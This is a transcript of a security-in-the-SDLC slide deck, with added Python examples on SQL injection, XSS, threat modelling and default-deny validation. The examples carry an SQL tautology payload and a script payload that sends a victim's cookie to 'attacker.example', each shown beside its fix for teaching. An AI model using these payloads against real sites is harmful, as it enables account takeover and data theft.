Security as a Process in Software Development Lifecycle v2.0

Presented by: Ahmed Saafan

Slide transcript (39 pages); uploaded by shruti, posted 03-Feb-2016

TRANSCRIPT

Page 1: Security as a Process in Software Development Lifecycle v2.0

Security As A Process In Software Development Lifecycle

Presented by: Ahmed Saafan

Page 2: Security as a Process in Software Development Lifecycle v2.0

Agenda

• Security layers
• Software lifecycle evolution
• Security in modern software lifecycle
• Analysis phase activities
• Design & development phases activities
• Threat modeling
• Deployment & testing phases activities
• A final word

Page 3: Security as a Process in Software Development Lifecycle v2.0

Security Layers

Layered security approach (defense in depth):

• Physical security
• Network security
• Host (OS) security
• Application security

Page 4: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Network-level vulnerabilities

• DoS
• Packet inspection, password sniffing
• Spoofing (identity theft)

Network breach mitigation techniques

• Firewalls
• IDS, IPS & IDP
• Log analysis

Page 5: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Host (OS) vulnerabilities

• Hardware/firmware vulnerabilities
• Windows RPC vulnerabilities

Host threat mitigation

• Choose the right OS for the job
• Don't just patch, protect.

Page 6: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Application-level vulnerabilities

• SQL injection
• Application DoS
• Session hijacking

Speaker notes (Ahmed):
Proof-of-concept application DoS: setting a crafted personal message in MSN Messenger (the string itself is garbled in this transcript) crashes the client that renders it. The workaround: delete your account's directory (named after your sign-in address) under C:\Documents and Settings\YOURSESSION\Local Settings\Application Data\Microsoft\Windows Live Contacts.
Applications that automate session hijacking: Juggernaut, T-Sight.
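The slide lists SQL injection without showing why it works. The following added example (not part of the deck) puts the vulnerable string-built login query next to the parameterised fix and runs both against an in-memory SQLite database; the schema, the two accounts and the payload are constructed for the demonstration, and plaintext passwords are kept only to keep it short.

```python
"""SQL injection: vulnerable string-built query beside the parameterised fix.
Added example, not from the slides; data and schema are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample: a users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Builds the statement by string formatting: the user's input becomes SQL.
    With password = "' OR '1'='1" the WHERE clause turns into
    name = 'alice' AND password = '' OR '1'='1', which is true for every row."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Parameterised: the driver passes the values separately from the SQL text,
    so quotes inside them are data, never syntax. (Real code compares a salted
    password hash here rather than the plaintext.)"""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, password)))


PAYLOAD = "' OR '1'='1"  # classic tautology injection


def demo() -> dict:
    """Same payload through both code paths, plus one honest login."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "alice", PAYLOAD),  # every account "logs in"
        "safe": login_safe(conn, "alice", PAYLOAD),              # nobody matches
        "legit": login_safe(conn, "bob", "hunter2"),             # normal use still works
    }


if __name__ == "__main__":
    print(demo())
```

One caveat for readers reproducing this elsewhere: `sqlite3.Connection.execute` refuses stacked statements (`'; DROP TABLE users; --`), so that variant fails here, but many other drivers run them, which is one more reason the fix is parameterisation rather than blocking particular characters.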
Page 8: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Application-level vulnerabilities

• SQL injection
• Application DoS
• Session hijacking
• Cross-site scripting (XSS)

Page 9: Security as a Process in Software Development Lifecycle v2.0

XSS

Type-0 attack (DOM-based / local)

Type-1 attack (reflected, non-persistent)

Type-2 attack (stored, persistent)

Speaker notes (Ahmed), type-0:
1. ELdoKsh sends Hamada (via e-mail or another mechanism) a URL of a maliciously constructed web page.
2. Hamada clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Hamada's computer.
4. The vulnerable HTML page contains JavaScript which executes in Hamada's computer's local zone.
5. ELdoKsh's malicious script may now run commands with the privileges Hamada holds on his own computer.

Speaker notes (Ahmed), type-1:
1. Hamada often visits a particular website hosted by Micro$oft. Micro$oft's website allows Hamada to log in with a username/password pair and store sensitive information, such as billing information.
2. ELdoKsh observes that Micro$oft's website contains a reflected XSS vulnerability.
3. ELdoKsh crafts a URL to exploit the vulnerability and sends Hamada an e-mail, making it look as if it came from Micro$oft (i.e. the e-mail is spoofed).
4. Hamada visits the URL provided by ELdoKsh while logged into Micro$oft's website.
5. The malicious script embedded in the URL executes in Hamada's browser as if it came directly from Micro$oft's server. The script steals sensitive information (authentication credentials, billing info, etc.) and sends it to ELdoKsh's web server without Hamada's knowledge.

Speaker notes (Ahmed), type-2:
1. Micro$oft hosts a website which allows users to post messages and other content for later viewing by other members.
2. ELdoKsh notices that Micro$oft's website is vulnerable to a type-2 XSS attack.
3. ELdoKsh posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to ELdoKsh's web server without their knowledge.
5. Later, ELdoKsh logs in as other site users and posts messages on their behalf....
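Both the type-1 and type-2 scenarios above reduce to the same coding defect: untrusted text written into HTML without being encoded for the place it lands. The following added example (not part of the deck) renders the forum page from the scenarios twice, once by plain string building and once with every untrusted value entity-encoded for element content. The payload, the collecting host `attacker.example` and the messages are constructed.

```python
"""Reflected (type-1) and stored (type-2) XSS: vulnerable rendering beside
output encoding. Added example, not from the slides; inputs are constructed."""
from __future__ import annotations
import html

# Constructed attacker input: posted as a forum message (type-2) or carried in
# the search parameter of a crafted link (type-1). It ships the victim's cookie
# to a host the attacker controls.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def render_vulnerable(search_term: str, messages: list[str]) -> str:
    """Echoes the search term (reflected) and the stored messages verbatim."""
    items = "".join(f"<li>{m}</li>" for m in messages)
    return f"<h1>Results for {search_term}</h1><ul>{items}</ul>"


def render_safe(search_term: str, messages: list[str]) -> str:
    """Same page; each untrusted value is encoded for HTML element content.
    Other contexts (attribute values, JavaScript strings, URLs) need their own
    encoders; html.escape alone is not enough there."""
    items = "".join(f"<li>{html.escape(m, quote=True)}</li>" for m in messages)
    return f"<h1>Results for {html.escape(search_term, quote=True)}</h1><ul>{items}</ul>"


def has_live_script(page: str) -> bool:
    """Demo check: did a real <script ...> element survive into the output?"""
    return "<script" in page.lower()


def demo() -> dict:
    """Run the hostile post and the hostile search term through both renderers."""
    messages = ["Hello everyone", PAYLOAD]  # one honest post, one hostile
    return {
        "vulnerable_executes": has_live_script(render_vulnerable(PAYLOAD, messages)),
        "safe_executes": has_live_script(render_safe(PAYLOAD, messages)),
        "safe_output": render_safe("a<b", ["x&y"]),
    }


if __name__ == "__main__":
    print(demo())
```

Encoding at output is the fix for the injection itself; marking the session cookie `HttpOnly` is a separate, defence-in-depth step that stops `document.cookie` from exposing it and so blunts this particular payload without removing the bug.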
Page 10: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Application-level vulnerabilities

• SQL injection
• Application DoS
• Session hijacking
• Cross-site scripting (XSS)
• Buffer overflow exploits
• Unhandled exceptions' exploits

Speaker notes (Ahmed):
Windows Vista mitigates buffer overflows with Address Space Layout Randomization (ASLR) and /GS stack cookies (a Visual C++ compiler protection). Linux has had comparable protections through kernel patches (non-executable stack, later PaX and ASLR) since the late 1990s.
Page 13: Security as a Process in Software Development Lifecycle v2.0

Security Layers: Application-level vulnerabilities

• SQL injection
• Application DoS
• Session hijacking
• Cross-site scripting (XSS)
• Buffer overflow exploits
• Unhandled exceptions' exploits

Is there a mitigation technique?

Page 14: Security as a Process in Software Development Lifecycle v2.0

Software lifecycle evolution

• Function-oriented (procedural) programming / flow charts
• Object-oriented programming / design
• UML standards & the modern software lifecycle

Page 15: Security as a Process in Software Development Lifecycle v2.0

Software lifecycle evolution

Page 16: Security as a Process in Software Development Lifecycle v2.0

Security in modern software lifecycle

• Setbacks caused by security (patch releases)
• The need for more secure software
• Security as a process in the SDLC

Page 17: Security as a Process in Software Development Lifecycle v2.0

Analysis phase activities

Take into consideration:

• Confidentiality
• Integrity
• Availability
• Possession
• Authenticity
• Utility

Speaker notes (Ahmed):
• Confidentiality: limit access to authorized users
• Integrity: guarantee that the data is correct and comes from the right person
• Availability: information is available when needed
• Possession: ownership and control of the information (distinct from confidentiality: a stolen encrypted backup is still confidential, but it is no longer possessed)
• Authenticity: the claimed origin of data and actions is genuine, so people cannot deny their actions because the actions are verifiably tied to them
• Utility: usefulness; if data is encrypted and the decryption key is unavailable, that is a loss of utility (the data is still confidential, possessed, intact and authentic)
Page 18: Security as a Process in Software Development Lifecycle v2.0

Design & Development phases activities

Take into consideration:

• Input/Output validation

Page 20: Security as a Process in Software Development Lifecycle v2.0

Design & Development phases activities

Take into consideration:

• Input/Output validation
• Principle of least privilege / default deny
• Compartmentalization (separation of privileges)
• Threat modeling

Page 21: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

Steps for threat modeling:

1. Identify critical assets

2. Decompose the system
   • Network diagram
   • Functionality diagram

Page 24: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

3. Identify possible points of attack
   • Trust boundaries
   • Data classification

Page 26: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

4. Identify threats for each node
   • STRIDE model

Page 27: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling: Step-by-step Model (Checklists)

Network threats
• Web services subjected to a denial-of-service attack
• IP spoofing
• Faulty configuration of firewall rules, allowing outsiders to get access to a database and change the data
• Errors in ACLs
• Sensitive data that flows unencrypted through the network

Host threats
• Using unpatched servers allows crackers to exploit known vulnerabilities
• Lack of clearly defined trust boundaries
• Improper server hardening guidelines, resulting in a mismatch between the server configuration and the security context in which it's placed

Application threats
• Code that's prone to buffer overflows, SQL injection, or cross-site scripting
• Defective or missing data encryption, resulting in password compromise

Page 28: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

Attack Trees

Page 29: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

5. Categorize & prioritize threats
   • Risk = Probability of occurrence (PO) × Business impact (BI)
   • DREAD model
   • Project risk analysis on threat trees

Page 30: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

6. Mitigate
   • Add cost of mitigation to attack trees
   • Decide based on risk vs. cost

Page 33: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling

Important notes:

• Assume that everything that might go wrong will go wrong
• Attack trees are dynamic

Speaker notes (Ahmed):
Attack trees change because requirements change, technology changes rapidly, and new exploits appear every day.
Page 34: Security as a Process in Software Development Lifecycle v2.0

Threat Modeling In A Nutshell

1. Identify critical assets
2. Decompose the system
   • Network diagram
   • Functionality diagram
3. Identify possible points of attack
   • Trust boundaries
   • Data classification
4. Identify threats
   • STRIDE model OR step-by-step model
   • Attack trees
5. Categorize and prioritize threats
   • Risk = PO × BI
   • DREAD model to calculate PO & BI
   • Project risks on attack trees
6. Mitigate
   • Add cost of mitigation to attack trees
   • Decide based on risk vs. cost
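Steps 4 to 6 of the summary are a calculation, so here they are carried through in code. This is an added example, not part of the deck: it costs attack trees Schneier-style (an OR node costs the attacker its cheapest child, an AND node the sum of its children), derives PO from the DREAD factors Reproducibility, Exploitability and Discoverability and BI from Damage and Affected users (each rated 1 to 3; this split and the scaling to 0..1 are assumptions, the slides only say DREAD feeds PO and BI), multiplies them for risk, and then applies an assumed decision rule: mitigate when the risk is above a threshold and the mitigation actually raises the attacker's cheapest path. The three threats, their DREAD ratings and all person-day costs are constructed for the illustration.

```python
"""Threat modelling steps 4-6 worked in code: costed attack trees, DREAD-derived
PO and BI, risk = PO x BI, and a risk-versus-cost mitigation decision.
Added example, not from the slides; scales, rule and data are assumptions."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional, Union


@dataclass
class Leaf:
    """An atomic attack step; attacker effort (person-days) before and after our mitigation."""
    name: str
    cost: float
    mitigated_cost: Optional[float] = None  # None: the mitigation does not touch this step


@dataclass
class Node:
    """OR: the attacker needs any one child. AND: the attacker needs all children."""
    name: str
    kind: str  # "OR" or "AND"
    children: list


def attacker_cost(node: Union[Node, Leaf], mitigated: bool = False) -> float:
    """Cheapest path for the attacker through this (sub)tree."""
    if isinstance(node, Leaf):
        if mitigated and node.mitigated_cost is not None:
            return node.mitigated_cost
        return node.cost
    costs = [attacker_cost(child, mitigated) for child in node.children]
    return min(costs) if node.kind == "OR" else sum(costs)


@dataclass
class Threat:
    name: str
    dread: dict  # keys D, R, E, A, Di -> 1 (low) .. 3 (high)
    tree: Union[Node, Leaf]
    mitigation_cost: float  # our effort (person-days) to apply the tree's mitigations


def probability_of_occurrence(dread: dict) -> float:
    """Assumed: PO from Reproducibility, Exploitability, Discoverability, scaled to 0..1."""
    return (dread["R"] + dread["E"] + dread["Di"]) / 9.0


def business_impact(dread: dict) -> float:
    """Assumed: BI from Damage and Affected users, scaled to 0..1."""
    return (dread["D"] + dread["A"]) / 6.0


def risk(threat: Threat) -> float:
    """Risk = PO x BI, as on the slide."""
    return probability_of_occurrence(threat.dread) * business_impact(threat.dread)


def prioritize(threats: list) -> list:
    return sorted(threats, key=risk, reverse=True)


def should_mitigate(threat: Threat, risk_threshold: float = 0.35) -> bool:
    """Assumed policy: spend on a mitigation only when the risk clears the threshold
    and the mitigation really raises the attacker's cheapest path; otherwise accept."""
    before = attacker_cost(threat.tree)
    after = attacker_cost(threat.tree, mitigated=True)
    return risk(threat) >= risk_threshold and after > before


# Constructed threats for the forum/billing web application from the XSS slides.
THREATS = [
    Threat("Dump customer table via SQL injection in the login form",
           dread={"D": 3, "R": 3, "E": 3, "A": 3, "Di": 2},
           tree=Node("read customer data", "OR", [
               Leaf("inject through the username field", cost=1, mitigated_cost=40),  # parameterised queries
               Node("talk to the database directly", "AND", [
                   Leaf("recover DB credentials from a config backup", cost=5),
                   Leaf("reach the DB port from the internet", cost=3, mitigated_cost=20),  # firewall rule
               ]),
           ]),
           mitigation_cost=6),
    Threat("Sniff plaintext passwords on the office LAN",
           dread={"D": 2, "R": 2, "E": 1, "A": 2, "Di": 1},
           tree=Node("capture a password", "AND", [
               Leaf("get a foothold on the LAN", cost=10),
               Leaf("sniff the unencrypted login", cost=1, mitigated_cost=50),  # TLS everywhere
           ]),
           mitigation_cost=4),
    Threat("Application DoS through the unbounded report endpoint",
           dread={"D": 1, "R": 3, "E": 3, "A": 2, "Di": 3},
           tree=Leaf("request huge date ranges in a loop", cost=1, mitigated_cost=15),  # rate limit
           mitigation_cost=3),
]


def plan(threats: list, risk_threshold: float = 0.35) -> list:
    """Steps 5 and 6 together: threats ordered by risk, with attacker cost before and
    after mitigation, our cost, and the decision."""
    return [{"threat": t.name,
             "risk": round(risk(t), 3),
             "attacker_cost_before": attacker_cost(t.tree),
             "attacker_cost_after": attacker_cost(t.tree, mitigated=True),
             "our_cost": t.mitigation_cost,
             "decision": "mitigate" if should_mitigate(t, risk_threshold) else "accept"}
            for t in prioritize(threats)]


if __name__ == "__main__":
    for row in plan(THREATS):
        print(row)
```

The point of keeping the tree and the DREAD scores separate is that they answer different questions: DREAD ranks which threats deserve attention first, while the tree shows whether a proposed control actually moves the attacker's cheapest path (parameterising the login query here shifts the cheapest route from the web form to the network path, which is why the firewall rule is part of the same mitigation). An "accept" outcome is a documented decision, to be revisited when the tree changes, as the following slides stress.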

Page 35: Security as a Process in Software Development Lifecycle v2.0

Design & Development phases activities

Take into consideration:

• Input/Output validation
• Principle of least privilege / default deny
• Compartmentalization (separation of privileges)
• Threat modeling
• Threat trees
• Integrate security into the quality assurance process
• Sanitization of data between subsystems
• Encryption of all communication must be possible
• No transmission of passwords in plain text
• Coding standards checklists
• Logging

Speaker notes (Ahmed):
Re-validate input when crossing subsystems.
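Three of the items above (default deny, compartmentalization, re-validation when crossing subsystems) fit in one small piece of code, so here is an added example that is not part of the deck. A web front end authorizes against an allow-list of role permissions (anything not listed is denied), validates an order identifier against an allow-list format, and calls a billing subsystem which validates the same value again instead of trusting its caller. The roles, the actions, the six-digit identifier format and the billing records are assumed for the illustration.

```python
"""Default deny, least privilege and re-validation at a subsystem boundary.
Added example, not from the slides; roles, actions and formats are assumed."""
import re

# Allow-list of what each role may do. Anything absent is denied; there is no
# list of "blocked" actions to keep up to date, so a newly added action stays
# denied until someone explicitly grants it.
PERMISSIONS = {
    "customer": {"view_order"},
    "support": {"view_order", "refund_order"},
}

ORDER_ID = re.compile(r"[0-9]{6}")  # assumed identifier format


def is_allowed(role: str, action: str) -> bool:
    """Unknown role -> empty set; unknown action -> not in set; both denied."""
    return action in PERMISSIONS.get(role, frozenset())


def validate_order_id(raw: str) -> str:
    """Allow-list validation: accept exactly what the format permits, reject the rest."""
    if not isinstance(raw, str) or not ORDER_ID.fullmatch(raw):
        raise ValueError("order id must be exactly six digits")
    return raw


# ---- billing subsystem: its own compartment, does not trust callers ----
def billing_lookup(order_id: str) -> dict:
    # The front end already validated this, but the billing API is reachable
    # from other subsystems too, so it re-validates at its own boundary.
    order_id = validate_order_id(order_id)
    return {"order": order_id, "amount": 42.0}  # constructed record


def billing_refund(order_id: str) -> dict:
    order_id = validate_order_id(order_id)
    return {"order": order_id, "refunded": True}  # constructed record


# ---- web front end ----
def handle_request(role: str, action: str, order_id: str) -> dict:
    """Authorize first (default deny), then validate input, then call the subsystem."""
    if not is_allowed(role, action):
        return {"status": 403}
    try:
        order_id = validate_order_id(order_id)
    except ValueError as exc:
        return {"status": 400, "error": str(exc)}
    handler = {"view_order": billing_lookup, "refund_order": billing_refund}[action]
    return {"status": 200, "result": handler(order_id)}


if __name__ == "__main__":
    print(handle_request("customer", "view_order", "123456"))
    print(handle_request("customer", "refund_order", "123456"))
    print(handle_request("support", "view_order", "12' OR 1=1"))
```

The second validation looks redundant from the front end's point of view; it exists because the billing subsystem cannot know who else will call it in a year, which is exactly the argument the speaker notes make.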
Page 36: Security as a Process in Software Development Lifecycle v2.0

Deployment & testing phases activities

Take into consideration:

• IT infrastructure availability
• Hardware requirements are met
• Remove trapdoors (maintenance hooks)
• External team to ensure risk mitigation
• If possible, get a black hat!
• Stress testing
• Regression testing
• Disaster recovery / system continuity

Speaker notes (Ahmed):
On February 22, 2007, participants were given local client access to the target computer and invited to try their luck at getting root access. An Australian, "gwerdna", won a MacBook Pro by cracking it in under 30 minutes.
On 7 October 2007, about 100 hackers took on the challenge of using the Yahoo! APIs to create something in 24 hours, in an event called Hack Day. In the end there were 31 submitted hacks, and each team or single hacker had 90 seconds of fame presenting the hack on three massive screens to the whole assembled audience and the 7 judges.
Page 37: Security as a Process in Software Development Lifecycle v2.0

A Final word

"Security is a process, not a product."

- Bruce Schneier

Open source software (OSS) and security

Page 38: Security as a Process in Software Development Lifecycle v2.0

Thank you

References:
• Software Engineering: Security as a Process in the SDLC, James Purcell, 2007
• Hack Proofing Your Network, Syngress, 2000
• Improving Security Across the Software Development Life Cycle, Task Force report, 2004
• Don't Just Patch, Protect!, Paul Wright, 2007
• Packet Sniffing in a Switched Environment, Tom King, 2006
• wikipedia.org/wiki/Session_hijacking
• www.0x000000.com/?i=424, Secure Input Validation
• en.wikipedia.org/wiki/Buffer_overflow
• Inside the Buffer Overflow Attack: Mechanism, Method, & Prevention, Mark E. Donaldson
• Software Engineering, Sommerville, 2005
• Assumptions in Intrusion Analysis, Rodney Caudle

Page 39: Security as a Process in Software Development Lifecycle v2.0

References (continued):
• Security Analogies, Scott Granneman, http://www.securityfocus.com/columnists/445
• Surprises Inside Microsoft Vista's EULA, Scott Granneman, http://www.securityfocus.com/columnists/420
• Session Hijacking, TechNet Magazine, January 2005, http://www.microsoft.com/technet/technetmag/issues/2005/01/SessionHijacking/?topics=/technet/technetmag/issues/2005/01/SessionHijacking
• Exploiting the Otherwise Non-Exploitable on Windows, Matt Miller (skape) and Skywing
• A Practical Approach to Threat Modeling, Tom Olzak
• Foundations of Attack Trees, Sjouke Mauw and Martijn Oostdijk
• From Product to Process: Bruce Schneier's Take on Security, M. E. Kabay, Network World Security Newsletter